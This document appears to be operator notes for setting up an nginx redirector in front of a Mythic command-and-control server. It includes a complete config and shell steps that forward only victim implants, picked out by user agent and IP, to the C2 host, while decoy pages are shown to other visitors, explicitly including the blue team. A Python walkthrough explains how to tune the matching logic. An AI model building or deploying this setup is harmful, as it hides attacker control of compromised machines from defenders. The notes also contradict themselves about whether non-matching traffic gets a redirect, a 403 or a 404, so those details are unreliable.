This custom rule only processes requests that originate from the victim environment and satisfy the conditions below. If the criteria don't match, the traffic is redirected to a legitimate website; if they match, the traffic is forwarded to the adversary C2 infrastructure.
CONDITIONS
User Agent
The endpoint/redirector only processes victim traffic if a specific user-agent string is identified.
If the traffic matches, the redirector forwards it to the C2 server.
If the traffic doesn't match, the redirector forwards it to a legitimate website or drops it.
IP Range/Target Domain
The endpoint/redirector only processes victim traffic if a specific IP range is identified.
If the traffic matches, the redirector forwards it to the C2 server.
If the traffic doesn't match, the redirector forwards it to a legitimate website or drops the packet.
root@oco:~$ cd /etc/nginx/conf.d
root@oco:~$ nano c2.conf
server {
    listen 443 ssl http2 default_server;
    listen [::]:443 ssl http2 default_server;
    server_name nuclear.{domain}.{tld};
    root /var/www/html;
    ssl_certificate "/etc/letsencrypt/live/nuclear.{domain}.{tld}/fullchain.pem";
    ssl_certificate_key "/etc/letsencrypt/live/nuclear.{domain}.{tld}/privkey.pem";
    ssl_session_cache shared:SSL:1m;
    ssl_session_timeout 10m;
    ssl_ciphers HIGH:!aNULL:!MD5;
    ssl_prefer_server_ciphers on;

    location / {
        set $C2 "";
        # user-agent condition; nginx comments use "#", and "~" is a case-sensitive
        # regex match, so escape dots and parentheses in the token, e.g.
        # ~ "42\.1\.228\.0" or ~ "Mozilla/5\.0 \(Windows NT 6\.3; Trident/7\.0; rv:11\.0\) like Gecko"
        if ($http_user_agent ~ "{randomIdentification}") {
            set $C2 A;
        }
        # source-address conditions; nginx exposes the client IP as $remote_addr
        # e.g. ~ "^74\.235\.35\.184$"
        if ($remote_addr ~ "{victimIP1 or victimIPRange}") {
            set $C2 "${C2}B";
        }
        # e.g. ~ "^20\.66\.87\.234$"
        if ($remote_addr ~ "{victimIP2 or victimIPRange}") {
            set $C2 "${C2}B";
        }
        # forward only when the user-agent condition and exactly one IP condition matched
        if ($C2 = "AB") {
            proxy_pass {mythicC2ServerURL};
            # e.g. http://20.66.23.137;
        }
        # this section is reached if the traffic doesn't match the specified conditions
        try_files $uri $uri/ =404;
    }

    error_page 404 /404.html;
    location = /404.html {
    }
    error_page 500 502 503 504 /50x.html;
    location = /50x.html {
    }
}
* note: the traffic from the targets to the nginx redirector is HTTPS, while the traffic from the nginx redirector to the Mythic C2 server is plain HTTP
- BOTH conditions MUST match for the traffic to pass through; otherwise a 403 Forbidden message is received
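To make the `$C2` flag logic and the regex pitfalls of the `~` matches concrete, here is an added Python model of the rule evaluation; it is example code written for this page, not part of the original notes or of nginx. The user agent and addresses are constructed sample values, and `classify` / `forwards_to_c2` are hypothetical helper names.

```python
import re

# Sample values constructed for this example (placeholders, not real hosts).
SAMPLE_UA = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
RAW_UA_PATTERN = SAMPLE_UA                          # pasted verbatim into "~", as in the notes
SAFE_UA_PATTERN = "^" + re.escape(SAMPLE_UA) + "$"  # metacharacters escaped and anchored
RAW_IP_PATTERNS = ["74.235.35.184", "20.66.87.234"]  # dots unescaped, unanchored
SAFE_IP_PATTERNS = ["^" + re.escape(ip) + "$" for ip in RAW_IP_PATTERNS]


def classify(user_agent, remote_addr, ua_pattern=RAW_UA_PATTERN, ip_patterns=RAW_IP_PATTERNS):
    """Build the $C2 flag string the way the nginx location block does.

    nginx's "~" operator is an unanchored, case-sensitive regex search, so
    re.search is the faithful equivalent. "A" is set once for a user-agent hit
    and one "B" is appended for every IP rule that matches.
    """
    flags = ""
    if re.search(ua_pattern, user_agent):
        flags += "A"
    for pattern in ip_patterns:
        if re.search(pattern, remote_addr):
            flags += "B"
    return flags


def forwards_to_c2(user_agent, remote_addr, **kw):
    """Mirror `if ($C2 = "AB") { proxy_pass ... }`: only the exact string "AB" forwards."""
    return classify(user_agent, remote_addr, **kw) == "AB"


if __name__ == "__main__":
    # Pasting the real UA as a regex fails: "(" ")" form a group and "." is a wildcard.
    print(classify(SAMPLE_UA, "74.235.35.184"))                              # B
    print(classify(SAMPLE_UA, "74.235.35.184", ua_pattern=SAFE_UA_PATTERN))  # AB
    # Unanchored IP regex: a different client address containing the substring passes.
    print(forwards_to_c2(SAMPLE_UA, "174.235.35.184", ua_pattern=SAFE_UA_PATTERN))  # True
    print(forwards_to_c2(SAMPLE_UA, "174.235.35.184", ua_pattern=SAFE_UA_PATTERN,
                         ip_patterns=SAFE_IP_PATTERNS))                      # False
    # Overlapping IP rules append "B" twice -> "ABB", which never equals "AB".
    print(classify(SAMPLE_UA, "74.235.35.184", ua_pattern=SAFE_UA_PATTERN,
                   ip_patterns=[r"^74\.235\.", r"^74\.235\.35\.184$"]))      # ABB
```

Any request whose flags are not exactly "AB" falls through to `try_files` rather than `proxy_pass`, which is the path a plain browser visit takes.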
root@nginxVM:~$ sudo nginx -s reload
* issue this command once everything is set up
c:\victim> BROWSER > https://nuclear.{domain}.{tld}
* if the victim views this page, they'll receive a "403 Forbidden" message,
because it MUST be the "payload agent" that accesses the adversary domain,
NOT the blue team!